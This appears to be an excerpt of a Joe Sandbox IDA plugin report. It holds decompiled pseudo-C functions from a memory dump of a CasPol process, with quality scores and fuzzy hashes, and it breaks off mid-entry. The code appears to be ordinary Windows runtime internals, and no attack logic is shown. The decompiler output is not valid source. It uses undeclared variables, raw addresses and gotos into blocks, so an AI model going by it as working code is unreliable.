                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 85%
                                                                  			E01424BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                                                                  				signed int _v8;
                                                                  				short _v20;
                                                                  				intOrPtr _v24;
                                                                  				intOrPtr _v28;
                                                                  				intOrPtr _v32;
                                                                  				char _v36;
                                                                  				char _v156;
                                                                  				short _v158;
                                                                  				intOrPtr _v160;
                                                                  				char _v164;
                                                                  				intOrPtr _v168;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				signed int _t45;
                                                                  				intOrPtr _t74;
                                                                  				signed char _t77;
                                                                  				short _t84;
                                                                  				char* _t85;
                                                                  				void* _t86;
                                                                  				intOrPtr _t87;
                                                                  				void* _t88;
                                                                  				signed int _t89;
                                                                  
                                                                  				_t83 = __edx;
                                                                  				_v8 =  *0x14ed360 ^ _t89;
                                                                  				_t45 = _a8 & 0x0000ffff;
                                                                  				_v158 = __edx;
                                                                  				_v168 = __ecx;
                                                                  				if(_t45 == 0) {
                                                                  					L22:
                                                                  					_t86 = 6;
                                                                  					L12:
                                                                  					L013FCC50(_t86);
                                                                  					L11:
                                                                  					return L0143B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                                                                  				}
                                                                  				_t77 = _a4;
                                                                  				if((_t77 & 0x00000001) != 0) {
                                                                  					goto L22;
                                                                  				}
                                                                  				_t8 = _t77 + 0x34; // 0xdce0ba00
                                                                  				if(_t45 !=  *_t8) {
                                                                  					goto L22;
                                                                  				}
                                                                  				_t9 = _t77 + 0x24; // 0x14e8504
                                                                  				E01412280(_t9, _t9);
                                                                  				_t87 = 0x78;
                                                                  				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                                                                  				E0143FA60( &_v156, 0, _t87);
                                                                  				_t13 = _t77 + 0x30; // 0x3db8
                                                                  				_t85 =  &_v156;
                                                                  				_v36 =  *_t13;
                                                                  				_v28 = _v168;
                                                                  				_v32 = 0;
                                                                  				_v24 = 0;
                                                                  				_v20 = _v158;
                                                                  				_v160 = 0;
                                                                  				while(1) {
                                                                  					_push( &_v164);
                                                                  					_push(_t87);
                                                                  					_push(_t85);
                                                                  					_push(0x18);
                                                                  					_push( &_v36);
                                                                  					_push(0x1e);
                                                                  					_t88 = E0143B0B0();
                                                                  					if(_t88 != 0xc0000023) {
                                                                  						break;
                                                                  					}
                                                                  					if(_t85 !=  &_v156) {
                                                                  						L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                                                                  					}
                                                                  					_t84 = L01414620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                                                                  					_v168 = _v164;
                                                                  					if(_t84 == 0) {
                                                                  						_t88 = 0xc0000017;
                                                                  						goto L19;
                                                                  					} else {
                                                                  						_t74 = _v160 + 1;
                                                                  						_v160 = _t74;
                                                                  						if(_t74 >= 0x10) {
                                                                  							L19:
                                                                  							_t86 = L013FCCC0(_t88);
                                                                  							if(_t86 != 0) {
                                                                  								L8:
                                                                  								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                                                                  								_t30 = _t77 + 0x24; // 0x14e8504
                                                                  								L0140FFB0(_t77, _t84, _t30);
                                                                  								if(_t84 != 0 && _t84 !=  &_v156) {
                                                                  									L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                                                                  								}
                                                                  								if(_t86 != 0) {
                                                                  									goto L12;
                                                                  								} else {
                                                                  									goto L11;
                                                                  								}
                                                                  							}
                                                                  							L6:
                                                                  							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                                                                  							if(_v164 != 0) {
                                                                  								_t83 = _t84;
                                                                  								L01424F49(_t77, _t84);
                                                                  							}
                                                                  							goto L8;
                                                                  						}
                                                                  						_t87 = _v168;
                                                                  						continue;
                                                                  					}
                                                                  				}
                                                                  				if(_t88 != 0) {
                                                                  					goto L19;
                                                                  				}
                                                                  				goto L6;
                                                                  			}

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 94%
                                                                  			E01408A0A(intOrPtr* __ecx, signed int __edx) {
                                                                  				signed int _v8;
                                                                  				char _v524;
                                                                  				signed int _v528;
                                                                  				void* _v532;
                                                                  				char _v536;
                                                                  				char _v540;
                                                                  				char _v544;
                                                                  				intOrPtr* _v548;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				signed int _t44;
                                                                  				void* _t46;
                                                                  				void* _t48;
                                                                  				signed int _t53;
                                                                  				signed int _t55;
                                                                  				intOrPtr* _t62;
                                                                  				void* _t63;
                                                                  				unsigned int _t75;
                                                                  				signed int _t79;
                                                                  				unsigned int _t81;
                                                                  				unsigned int _t83;
                                                                  				signed int _t84;
                                                                  				void* _t87;
                                                                  
                                                                  				_t76 = __edx;
                                                                  				_v8 =  *0x14ed360 ^ _t84;
                                                                  				_v536 = 0x200;
                                                                  				_t79 = 0;
                                                                  				_v548 = __edx;
                                                                  				_v544 = 0;
                                                                  				_t62 = __ecx;
                                                                  				_v540 = 0;
                                                                  				_v532 =  &_v524;
                                                                  				if(__edx == 0 || __ecx == 0) {
                                                                  					L6:
                                                                  					return L0143B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                                                                  				} else {
                                                                  					_v528 = 0;
                                                                  					E0140E9C0(1, __ecx, 0, 0,  &_v528);
                                                                  					_t44 = _v528;
                                                                  					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                                                                  					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                                                                  					_t46 = 0xa;
                                                                  					_t87 = _t81 - _t46;
                                                                  					if(_t87 > 0 || _t87 == 0) {
                                                                  						 *_v548 = 0x13d1180;
                                                                  						L5:
                                                                  						_t79 = 1;
                                                                  						goto L6;
                                                                  					} else {
                                                                  						_t48 = L01421DB5(_t62,  &_v532,  &_v536);
                                                                  						_t76 = _v528;
                                                                  						if(_t48 == 0) {
                                                                  							L9:
                                                                  							L01433C2A(_t81, _t76,  &_v544);
                                                                  							 *_v548 = _v544;
                                                                  							goto L5;
                                                                  						}
                                                                  						_t62 = _v532;
                                                                  						if(_t62 != 0) {
                                                                  							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                                                                  							_t53 =  *_t62;
                                                                  							_v528 = _t53;
                                                                  							if(_t53 != 0) {
                                                                  								_t63 = _t62 + 4;
                                                                  								_t55 = _v528;
                                                                  								do {
                                                                  									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                                                                  										if(E01408999(_t63,  &_v540) == 0) {
                                                                  											_t55 = _v528;
                                                                  										} else {
                                                                  											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                                                                  											_t55 = _v528;
                                                                  											if(_t75 >= _t83) {
                                                                  												_t83 = _t75;
                                                                  											}
                                                                  										}
                                                                  									}
                                                                  									_t63 = _t63 + 0x14;
                                                                  									_t55 = _t55 - 1;
                                                                  									_v528 = _t55;
                                                                  								} while (_t55 != 0);
                                                                  								_t62 = _v532;
                                                                  							}
                                                                  							if(_t62 !=  &_v524) {
                                                                  								L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                                                                  							}
                                                                  							_t76 = _t83 & 0x0000ffff;
                                                                  							_t81 = _t83 >> 0x10;
                                                                  						}
                                                                  						goto L9;
                                                                  					}
                                                                  				}
                                                                  			}




























                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5a60aa188602e62872d95e40961cfaeb93b0eb1a8b9a4d2b421c06b442061de4
                                                                  • Instruction ID: 38618cb6bb8dd469318512e39f458a5163599b7ac6a074ece1b34f34b1866b7e
                                                                  • Opcode Fuzzy Hash: 5a60aa188602e62872d95e40961cfaeb93b0eb1a8b9a4d2b421c06b442061de4
                                                                  • Instruction Fuzzy Hash: B94157B1E0022D9BDB25DF5AC988AAAB7F4EB54300F1045FAD919973A2D7709E81CF50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 69%
                                                                  			E014769A6(signed short* __ecx, void* __eflags) {
                                                                  				signed int _v8;
                                                                  				signed int _v16;
                                                                  				intOrPtr _v20;
                                                                  				signed int _v24;
                                                                  				signed short _v28;
                                                                  				signed int _v32;
                                                                  				intOrPtr _v36;
                                                                  				signed int _v40;
                                                                  				char* _v44;
                                                                  				signed int _v48;
                                                                  				intOrPtr _v52;
                                                                  				signed int _v56;
                                                                  				char _v60;
                                                                  				signed int _v64;
                                                                  				char _v68;
                                                                  				char _v72;
                                                                  				signed short* _v76;
                                                                  				signed int _v80;
                                                                  				char _v84;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				void* _t68;
                                                                  				intOrPtr _t73;
                                                                  				signed short* _t74;
                                                                  				void* _t77;
                                                                  				void* _t78;
                                                                  				signed int _t79;
                                                                  				signed int _t80;
                                                                  
                                                                  				_v8 =  *0x14ed360 ^ _t80;
                                                                  				_t75 = 0x100;
                                                                  				_v64 = _v64 & 0x00000000;
                                                                  				_v76 = __ecx;
                                                                  				_t79 = 0;
                                                                  				_t68 = 0;
                                                                  				_v72 = 1;
                                                                  				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                                                                  				_t77 = 0;
                                                                  				if(L01406C59(__ecx[2], 0x100, __eflags) != 0) {
                                                                  					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                                  					if(_t79 != 0 && E01476BA3() != 0) {
                                                                  						_push(0);
                                                                  						_push(0);
                                                                  						_push(0);
                                                                  						_push(0x1f0003);
                                                                  						_push( &_v64);
                                                                  						if(E01439980() >= 0) {
                                                                  							E01412280(_t56, 0x14e8778);
                                                                  							_t77 = 1;
                                                                  							_t68 = 1;
                                                                  							if( *0x14e8774 == 0) {
                                                                  								asm("cdq");
                                                                  								 *(_t79 + 0xf70) = _v64;
                                                                  								 *(_t79 + 0xf74) = 0x100;
                                                                  								_t75 = 0;
                                                                  								_t73 = 4;
                                                                  								_v60 =  &_v68;
                                                                  								_v52 = _t73;
                                                                  								_v36 = _t73;
                                                                  								_t74 = _v76;
                                                                  								_v44 =  &_v72;
                                                                  								 *0x14e8774 = 1;
                                                                  								_v56 = 0;
                                                                  								_v28 = _t74[2];
                                                                  								_v48 = 0;
                                                                  								_v20 = ( *_t74 & 0x0000ffff) + 2;
                                                                  								_v40 = 0;
                                                                  								_v32 = 0;
                                                                  								_v24 = 0;
                                                                  								_v16 = 0;
                                                                  								if(L013FB6F0(0x13dc338, 0x13dc288, 3,  &_v60) == 0) {
                                                                  									_v80 = _v80 | 0xffffffff;
                                                                  									_push( &_v84);
                                                                  									_push(0);
                                                                  									_push(_v64);
                                                                  									_v84 = 0xfa0a1f00;
                                                                  									L01439520();
                                                                  								}
                                                                  							}
                                                                  						}
                                                                  					}
                                                                  				}
                                                                  				if(_v64 != 0) {
                                                                  					_push(_v64);
                                                                  					E014395D0();
                                                                  					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                                                                  					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                                                                  				}
                                                                  				if(_t77 != 0) {
                                                                  					L0140FFB0(_t68, _t77, 0x14e8778);
                                                                  				}
                                                                  				_pop(_t78);
                                                                  				return L0143B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                                                                  			}

































                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 904a8e6d18c44e36c8b8123c45d475a7c8df642a52875b8b2368d404948aa719
                                                                  • Instruction ID: fd93413876124e8ad67729485fb99f1d53cee76dc9c03a0334a21b571df6ef0f
                                                                  • Opcode Fuzzy Hash: 904a8e6d18c44e36c8b8123c45d475a7c8df642a52875b8b2368d404948aa719
                                                                  • Instruction Fuzzy Hash: 9D41AFB1D006099FEB20DFAAD940BFEBBF5EF58314F14852EE914A7260DB709905CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 85%
                                                                  			E013F5210(intOrPtr _a4, void* _a8) {
                                                                  				void* __ecx;
                                                                  				intOrPtr _t31;
                                                                  				signed int _t32;
                                                                  				signed int _t33;
                                                                  				intOrPtr _t35;
                                                                  				signed int _t52;
                                                                  				void* _t54;
                                                                  				void* _t56;
                                                                  				unsigned int _t59;
                                                                  				signed int _t60;
                                                                  				void* _t61;
                                                                  
                                                                  				_t61 = E013F52A5(1);
                                                                  				if(_t61 == 0) {
                                                                  					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                                  					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                                                                  					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                                                                  				} else {
                                                                  					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                                                                  					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                                                                  				}
                                                                  				_t60 = _t59 >> 1;
                                                                  				_t32 = 0x3a;
                                                                  				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                                                                  					_t52 = _t60 + _t60;
                                                                  					if(_a4 > _t52) {
                                                                  						goto L5;
                                                                  					}
                                                                  					if(_t61 != 0) {
                                                                  						asm("lock xadd [esi], eax");
                                                                  						if((_t32 | 0xffffffff) == 0) {
                                                                  							_push( *((intOrPtr*)(_t61 + 4)));
                                                                  							E014395D0();
                                                                  							L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                                  						}
                                                                  					} else {
                                                                  						E0140EB70(_t54, 0x14e79a0);
                                                                  					}
                                                                  					_t26 = _t52 + 2; // 0xddeeddf0
                                                                  					return _t26;
                                                                  				} else {
                                                                  					_t52 = _t60 + _t60;
                                                                  					if(_a4 < _t52) {
                                                                  						if(_t61 != 0) {
                                                                  							asm("lock xadd [esi], eax");
                                                                  							if((_t32 | 0xffffffff) == 0) {
                                                                  								_push( *((intOrPtr*)(_t61 + 4)));
                                                                  								E014395D0();
                                                                  								L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                                  							}
                                                                  						} else {
                                                                  							E0140EB70(_t54, 0x14e79a0);
                                                                  						}
                                                                  						return _t52;
                                                                  					}
                                                                  					L5:
                                                                  					_t33 = E0143F3E0(_a8, _t54, _t52);
                                                                  					if(_t61 == 0) {
                                                                  						E0140EB70(_t54, 0x14e79a0);
                                                                  					} else {
                                                                  						asm("lock xadd [esi], eax");
                                                                  						if((_t33 | 0xffffffff) == 0) {
                                                                  							_push( *((intOrPtr*)(_t61 + 4)));
                                                                  							E014395D0();
                                                                  							L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                                  						}
                                                                  					}
                                                                  					_t35 = _a8;
                                                                  					if(_t60 <= 1) {
                                                                  						L9:
                                                                  						_t60 = _t60 - 1;
                                                                  						 *((short*)(_t52 + _t35 - 2)) = 0;
                                                                  						goto L10;
                                                                  					} else {
                                                                  						_t56 = 0x3a;
                                                                  						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                                                                  							 *((short*)(_t52 + _t35)) = 0;
                                                                  							L10:
                                                                  							return _t60 + _t60;
                                                                  						}
                                                                  						goto L9;
                                                                  					}
                                                                  				}
                                                                  			}















                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 224b9b1eee732597972d20a42388ed2e30d73d228b83a5678f4924c3ab60e8f4
                                                                  • Instruction ID: 16a43d98edde6b2b373593d9bbf3ad61567f191c46412532f7db88fc98b1fd91
                                                                  • Opcode Fuzzy Hash: 224b9b1eee732597972d20a42388ed2e30d73d228b83a5678f4924c3ab60e8f4
                                                                  • Instruction Fuzzy Hash: 37312436241A01EBC762AB19C880F6A7BA5FF60765F114B2FF9550B6F1DB70F805C690
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E01433D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                  				intOrPtr _v8;
                                                                  				char _v12;
                                                                  				signed short** _t33;
                                                                  				short* _t38;
                                                                  				intOrPtr* _t39;
                                                                  				intOrPtr* _t41;
                                                                  				signed short _t43;
                                                                  				intOrPtr* _t47;
                                                                  				intOrPtr* _t53;
                                                                  				signed short _t57;
                                                                  				intOrPtr _t58;
                                                                  				signed short _t60;
                                                                  				signed short* _t61;
                                                                  
                                                                  				_t47 = __ecx;
                                                                  				_t61 = __edx;
                                                                  				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                                                  				if(_t60 > 0xfffe) {
                                                                  					L22:
                                                                  					return 0xc0000106;
                                                                  				}
                                                                  				if(__edx != 0) {
                                                                  					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                                                  						L5:
                                                                  						E01407B60(0, _t61, 0x13d11c4);
                                                                  						_v12 =  *_t47;
                                                                  						_v12 = _v12 + 0xfff8;
                                                                  						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                                                  						E01407B60(0xfff8, _t61,  &_v12);
                                                                  						_t33 = _a8;
                                                                  						if(_t33 != 0) {
                                                                  							 *_t33 = _t61;
                                                                  						}
                                                                  						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                  						_t53 = _a12;
                                                                  						if(_t53 != 0) {
                                                                  							_t57 = _t61[2];
                                                                  							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                                                  							while(_t38 >= _t57) {
                                                                  								if( *_t38 == 0x5c) {
                                                                  									_t41 = _t38 + 2;
                                                                  									if(_t41 == 0) {
                                                                  										break;
                                                                  									}
                                                                  									_t58 = 0;
                                                                  									if( *_t41 == 0) {
                                                                  										L19:
                                                                  										 *_t53 = _t58;
                                                                  										goto L7;
                                                                  									}
                                                                  									 *_t53 = _t41;
                                                                  									goto L7;
                                                                  								}
                                                                  								_t38 = _t38 - 2;
                                                                  							}
                                                                  							_t58 = 0;
                                                                  							goto L19;
                                                                  						} else {
                                                                  							L7:
                                                                  							_t39 = _a16;
                                                                  							if(_t39 != 0) {
                                                                  								 *_t39 = 0;
                                                                  								 *((intOrPtr*)(_t39 + 4)) = 0;
                                                                  								 *((intOrPtr*)(_t39 + 8)) = 0;
                                                                  								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                                                  							}
                                                                  							return 0;
                                                                  						}
                                                                  					}
                                                                  					_t61 = _a4;
                                                                  					if(_t61 != 0) {
                                                                  						L3:
                                                                  						_t43 = L01414620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                                                  						_t61[2] = _t43;
                                                                  						if(_t43 == 0) {
                                                                  							return 0xc0000017;
                                                                  						}
                                                                  						_t61[1] = _t60;
                                                                  						 *_t61 = 0;
                                                                  						goto L5;
                                                                  					}
                                                                  					goto L22;
                                                                  				}
                                                                  				_t61 = _a4;
                                                                  				if(_t61 == 0) {
                                                                  					return 0xc000000d;
                                                                  				}
                                                                  				goto L3;
                                                                  			}

















                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d291a1cfe06de33bf6925d8615fdf06b198af4d15ad0ee321aa595be5f926484
                                                                  • Instruction ID: ae7586146a7137064511215b897b704aefbc9c47c5080d7535af612605595867
                                                                  • Opcode Fuzzy Hash: d291a1cfe06de33bf6925d8615fdf06b198af4d15ad0ee321aa595be5f926484
                                                                  • Instruction Fuzzy Hash: A831DC35A006119BC725CF2EC846A6BBBE5FF88710B05806FE94ACB370E634D842C7A1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 68%
                                                                  			E0141C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                                                  				signed int* _v8;
                                                                  				char _v16;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				signed char _t33;
                                                                  				signed char _t43;
                                                                  				signed char _t48;
                                                                  				signed char _t62;
                                                                  				void* _t63;
                                                                  				intOrPtr _t69;
                                                                  				intOrPtr _t71;
                                                                  				unsigned int* _t82;
                                                                  				void* _t83;
                                                                  
                                                                  				_t80 = __ecx;
                                                                  				_t82 = __edx;
                                                                  				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                                                  				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                                                  				if((_t33 & 0x00000001) != 0) {
                                                                  					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                                                  					if(E01417D50() != 0) {
                                                                  						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                  					} else {
                                                                  						_t43 = 0x7ffe0386;
                                                                  					}
                                                                  					if( *_t43 != 0) {
                                                                  						_t43 = L014C8D34(_v8, _t80);
                                                                  					}
                                                                  					E01412280(_t43, _t82);
                                                                  					if( *((char*)(_t80 + 0xdc)) == 0) {
                                                                  						L0140FFB0(_t62, _t80, _t82);
                                                                  						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                                                  						_t30 = _t80 + 0xd0; // 0xd0
                                                                  						_t83 = _t30;
                                                                  						E014C8833(_t83,  &_v16);
                                                                  						_t81 = _t80 + 0x90;
                                                                  						L0140FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                                                  						_t63 = 0;
                                                                  						_push(0);
                                                                  						_push(_t83);
                                                                  						_t48 = E0143B180();
                                                                  						if(_a4 != 0) {
                                                                  							E01412280(_t48, _t81);
                                                                  						}
                                                                  					} else {
                                                                  						_t69 = _v8;
                                                                  						_t12 = _t80 + 0x98; // 0x98
                                                                  						_t13 = _t69 + 0xc; // 0x575651ff
                                                                  						E0141BB2D(_t13, _t12);
                                                                  						_t71 = _v8;
                                                                  						_t15 = _t80 + 0xb0; // 0xb0
                                                                  						_t16 = _t71 + 8; // 0x8b000cc2
                                                                  						E0141BB2D(_t16, _t15);
                                                                  						E0141B944(_v8, _t62);
                                                                  						 *((char*)(_t80 + 0xdc)) = 0;
                                                                  						L0140FFB0(0, _t80, _t82);
                                                                  						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                                                  						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                                                  						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                                                  						 *(_t80 + 0xde) = 0;
                                                                  						if(_a4 == 0) {
                                                                  							_t25 = _t80 + 0x90; // 0x90
                                                                  							L0140FFB0(0, _t80, _t25);
                                                                  						}
                                                                  						_t63 = 1;
                                                                  					}
                                                                  					return _t63;
                                                                  				}
                                                                  				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                                                  				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                                                  				if(_a4 == 0) {
                                                                  					_t24 = _t80 + 0x90; // 0x90
                                                                  					L0140FFB0(0, __ecx, _t24);
                                                                  				}
                                                                  				return 0;
                                                                  			}

















                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                  • Instruction ID: a3cb747ccdf53d73ad800aa90ce11a8a2e8cba8712a7d2ae789f7630eb07445a
                                                                  • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                  • Instruction Fuzzy Hash: 76311671A81547BBD715EBB6C890BEAF764BF62204F04416FC41C87365DB386A0ACBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 76%
                                                                  			E01477016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                                                  				signed int _v8;
                                                                  				char _v588;
                                                                  				intOrPtr _v592;
                                                                  				intOrPtr _v596;
                                                                  				signed short* _v600;
                                                                  				char _v604;
                                                                  				short _v606;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				signed short* _t55;
                                                                  				void* _t56;
                                                                  				signed short* _t58;
                                                                  				signed char* _t61;
                                                                  				char* _t68;
                                                                  				void* _t69;
                                                                  				void* _t71;
                                                                  				void* _t72;
                                                                  				signed int _t75;
                                                                  
                                                                  				_t64 = __edx;
                                                                  				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                                                  				_v8 =  *0x14ed360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                                                  				_t55 = _a16;
                                                                  				_v606 = __ecx;
                                                                  				_t71 = 0;
                                                                  				_t58 = _a12;
                                                                  				_v596 = __edx;
                                                                  				_v600 = _t58;
                                                                  				_t68 =  &_v588;
                                                                  				if(_t58 != 0) {
                                                                  					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                                                  					if(_t55 != 0) {
                                                                  						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                                                  					}
                                                                  				}
                                                                  				_t8 = _t71 + 0x2a; // 0x28
                                                                  				_t33 = _t8;
                                                                  				_v592 = _t8;
                                                                  				if(_t71 <= 0x214) {
                                                                  					L6:
                                                                  					 *((short*)(_t68 + 6)) = _v606;
                                                                  					if(_t64 != 0xffffffff) {
                                                                  						asm("cdq");
                                                                  						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                                                  						 *((char*)(_t68 + 0x28)) = _a4;
                                                                  						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                                                  						 *((char*)(_t68 + 0x29)) = _a8;
                                                                  						if(_t71 != 0) {
                                                                  							_t22 = _t68 + 0x2a; // 0x2a
                                                                  							_t64 = _t22;
                                                                  							E01476B4C(_t58, _t22, _t71,  &_v604);
                                                                  							if(_t55 != 0) {
                                                                  								_t25 = _v604 + 0x2a; // 0x2a
                                                                  								_t64 = _t25 + _t68;
                                                                  								E01476B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                                                  							}
                                                                  							if(E01417D50() == 0) {
                                                                  								_t61 = 0x7ffe0384;
                                                                  							} else {
                                                                  								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                  							}
                                                                  							_push(_t68);
                                                                  							_push(_v592 + 0xffffffe0);
                                                                  							_push(0x402);
                                                                  							_push( *_t61 & 0x000000ff);
                                                                  							E01439AE0();
                                                                  						}
                                                                  					}
                                                                  					_t35 =  &_v588;
                                                                  					if( &_v588 != _t68) {
                                                                  						_t35 = L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                                                  					}
                                                                  					L16:
                                                                  					_pop(_t69);
                                                                  					_pop(_t72);
                                                                  					_pop(_t56);
                                                                  					return L0143B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                                                  				}
                                                                  				_t68 = L01414620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                                                  				if(_t68 == 0) {
                                                                  					goto L16;
                                                                  				} else {
                                                                  					_t58 = _v600;
                                                                  					_t64 = _v596;
                                                                  					goto L6;
                                                                  				}
                                                                  			}























                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cc007f3044028a4428e02a4a9047b92b36f57703fd20714d6d08a154055cf9b3
